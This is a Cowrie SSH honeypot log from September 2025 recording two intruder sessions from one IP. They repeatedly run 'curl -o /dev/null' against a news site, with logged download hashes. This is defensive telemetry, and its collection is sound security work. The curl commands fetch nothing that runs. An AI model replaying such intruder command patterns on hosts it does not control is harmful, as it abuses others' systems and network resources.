{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.679704Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.689688Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.691020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.695227Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.696381Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.702182Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.732022Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.733574Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.737330Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.738014Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.741355Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.771856Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.773216Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.777926Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.779381Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.794509Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.812680Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.813967Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.817808Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.819265Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.839983Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.859955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.861151Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.864004Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.867174Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.868923Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.872726Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.878346Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.880330Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.904687Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.905961Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.912560Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.913759Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.945578Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.947075Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.951992Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.953431Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.954524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.979360Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.998046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.999271Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.004661Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.006644Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.010921Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.022087Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.039029Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.040341Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.044664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.045744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.080981Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.082449Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.086956Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.087887Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.100551Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.118302Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.129806Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.130967Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.134600Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.135599Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.155796Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.186260Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.187553Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.192807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.193849Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.235367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.236512Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.241018Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.242076Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.244605Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.249870Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.272489Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.274084Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.275133Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.294970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.298089Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.319799Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.329634Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.330693Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.334225Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.335153Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.367566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.368734Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.371898Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.372810Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.392874Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.398890Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.400523Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.401499Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.406008Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.413202Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
